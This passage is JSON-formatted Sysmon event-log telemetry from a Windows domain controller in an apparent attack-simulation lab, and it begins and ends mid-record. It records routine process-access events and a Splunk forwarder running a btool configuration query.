06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3512,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3513,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3514,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00109B7A0500}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00109B7A0500}","TargetProcessId":"4432","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3515,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.700\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-0010D07B0500}\r\nProcessId: 3292\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00109B7A0500}\r\nParentProcessId: 4432\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.700","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-0010D07B0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00109B7A0500}","ParentProcessId":"4432","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3516,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00109B7A0500}\r\nSourceProcessId: 4432\r\nSourceThreadId: 3128\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010D07B0500}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00109B7A0500}","SourceProcessId":"4432","SourceThreadId":"3128","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010D07B0500}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3517,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010D07B0500}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010D07B0500}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3518,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3519,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3520,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 